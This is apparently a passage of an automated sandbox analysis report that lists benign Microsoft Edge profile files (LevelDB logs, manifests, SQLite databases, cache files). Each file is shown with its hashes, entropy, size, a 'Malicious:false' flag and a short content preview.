                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9e11fb08-f237-43b6-985e-5dcc35ab9b24.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):1695826
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.041139915711263
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24576:XPfQUg6kAdRhiGzmYoAo2ENU0ifYeV3br2M:XPfZ/mS5
                                                                                                                                                                                                                                                                                                MD5:E95A252BAF40033A22F0B2D05067C29A
                                                                                                                                                                                                                                                                                                SHA1:203787759784141380A747F703BBB288ABA0B3FA
                                                                                                                                                                                                                                                                                                SHA-256:1E2C58B9CBA00DEE6CC4E925398F0C286750EC33F66120086B69268B5928A91B
                                                                                                                                                                                                                                                                                                SHA-512:7E55FA2ABB5AC375827F7DA073A133B841B2D6EBA4A332DCEE4149165DA8F0701B21D53D17EDEAD46476289D2BE2852BA6A4CE37316705EF30A884F8C104A972
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1..z..................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13385951021397862.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"2DPW9BV28WrPpgGHdKsEvldNQvD7dA0AAxPa3B/lKN0=","size":11989}]R'...................QUERY_TIMESTAMP:edge_hub_apps_manifest_gz4.7.*.13385951021398496.$QUERY:edge_hub_apps_manifest_gz4.7.*..[{"name":"edge_hub_apps_manifest_gz","url":"https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline","version":{"major":4,"minor":7,"patch":107},"hash":"Qoxdh2pZS19o99emYo77uFsfzxtXVDB75kV6eln53YE=","size":1682291}]=_.../..............'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.]{.. "configVersion": 32,.. "PrivilegedExperiences": [.. "ShorelinePrivileged

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):293
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.112207199113205
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOvRXhM1wkn23oH+Tcwt9Eh1ZB2KLlNi4q2Pwkn23oH+Tcwt9Eh1tIFUv:7JxrfYeb9Eh1ZFLm4vYfYeb9Eh16FUv
                                                                                                                                                                                                                                                                                                MD5:8F3D6C3C9C43EFF4F7B1A29FA3F0D8F9
                                                                                                                                                                                                                                                                                                SHA1:49AD006CE35BB84292717D36A0E4E33D4D213721
                                                                                                                                                                                                                                                                                                SHA-256:A6801EE379F5CC69DFEB1BC95BD047B5681A1F726C9E6AC721DF7AE9024F172D
                                                                                                                                                                                                                                                                                                SHA-512:06462BBDB2E337E9475D15D26AA077A7CC0CF4899F071576B14D92365E2A17A3DE5311B23AF9977E46D3054F254A0C94861D6C142C5C2CF79D5AF82F8318C5FF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:38.071 22c4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db since it was missing..2025/03/08-18:43:38.307 22c4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome\AssistanceHomeSQLite

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):12288
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.3202460253800455
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:l9bNFlEuWk8TRH9MRumWEyE4gLueXdNOmWxFxCxmWxYgCxmW5y/mWz4ynLAtD/W4:TLiuWkMORuHEyESeXdwDQ3SOAtD/ie
                                                                                                                                                                                                                                                                                                MD5:40B18EC43DB334E7B3F6295C7626F28D
                                                                                                                                                                                                                                                                                                SHA1:0E46584B0E0A9703C6B2EC1D246F41E63AF2296F
                                                                                                                                                                                                                                                                                                SHA-256:85E961767239E90A361FB6AA0A3FD9DAA57CAAF9E30599BB70124F1954B751C8
                                                                                                                                                                                                                                                                                                SHA-512:8BDACDC4A9559E4273AD01407D5D411035EECD927385A51172F401558444AD29B5AD2DC5562D1101244665EBE86BBDDE072E75ECA050B051482005EB6A52CDBD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.46255178920484175
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu1:TouQq3qh7z3bY2LNW9WMcUvBu1
                                                                                                                                                                                                                                                                                                MD5:4B1645D970295C196F7822BF25AB7F18
                                                                                                                                                                                                                                                                                                SHA1:B3165C4D6776371156CFE572FE2DB74836198CA4
                                                                                                                                                                                                                                                                                                SHA-256:D14E29B81A9B3BEFCECD2C2CA625F4F7849E45E4EA06A5E58ADCE7136FA5EAFA
                                                                                                                                                                                                                                                                                                SHA-512:C9A72A2B4A034F1381194371A11988E79FED9DF6546FBFFEC5986D1F94032F9C06BAF252D68FCEC44A8C75AB0233D3FD2BFCC0C2E818D519991D174FFCC85DFE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_0

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_2

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_3

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\index

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):262512
                                                                                                                                                                                                                                                                                                Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:LsNl4A+lt:Ls349X
                                                                                                                                                                                                                                                                                                MD5:B4B437153981FA8E9C303C4639BFDBAA
                                                                                                                                                                                                                                                                                                SHA1:A7EF4E95FFE99FC2D0CD226B54D5104AAE49A6A2
                                                                                                                                                                                                                                                                                                SHA-256:CCFD02B37E5F21DDB78344D92003E6A09BE8CC87A87D763D651671997D0E456A
                                                                                                                                                                                                                                                                                                SHA-512:CA2016010F518FCD75E896293E44D6557C64384D71DF82BA33EA310CD9DC81F96B2066B8F40E47A27E3F5A9085572CD151BBCE3051CD8D5363745CF09B6454DD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.........................................R.s./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):33
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):305
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.240523532850275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOv6Xc3M1wkn23oH+TcwtnG2tbB2KLlNHUXOq2Pwkn23oH+TcwtnG2tMsIFUv:7CM3rfYebn9VFLLUXOvYfYebn9GFUv
                                                                                                                                                                                                                                                                                                MD5:D9272F8698AD443C57C6D04C9B6B37D4
                                                                                                                                                                                                                                                                                                SHA1:4E43584BB456A385EA4A192E678E015F2158A5C9
                                                                                                                                                                                                                                                                                                SHA-256:732C93AFC49C597B04D9FE64F5FD6539DF8F12E833635BC35BA89A20AD8F3EF4
                                                                                                                                                                                                                                                                                                SHA-512:6F047F8EB21BE3F40A9B194AA5DD33D8C446B562881C128EBD7F88E98644A252B2984BD0E3CCF95686BB3FA6B49F6BA0A6D0D45A1FD52462EA35E2E7945AB858
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:29.745 1e14 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db since it was missing..2025/03/08-18:43:29.787 1e14 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 14, database pages 8, cookie 0xe, schema 4, UTF-8, version-valid-for 14
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.494709561094235
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLEC30OIcqIn2o0FUFlA2cs0US5S693Xlej2:ThLaJUnAg0UB6I
                                                                                                                                                                                                                                                                                                MD5:CF7760533536E2AF66EA68BC3561B74D
                                                                                                                                                                                                                                                                                                SHA1:E991DE2EA8F42AE7E0A96A3B3B8AF87A689C8CCD
                                                                                                                                                                                                                                                                                                SHA-256:E1F183FAE5652BA52F5363A7E28BF62B53E7781314C9AB76B5708AF9918BE066
                                                                                                                                                                                                                                                                                                SHA-512:38B15FE7503F6DFF9D39BC74AA0150A7FF038029F973BE9A37456CDE6807BCBDEAB06E624331C8DFDABE95A5973B0EE26A391DB2587E614A37ADD50046470162
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...i............t...c................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.6132678248683667
                                                                                                                                                                                                                                                                                                Encrypted:false
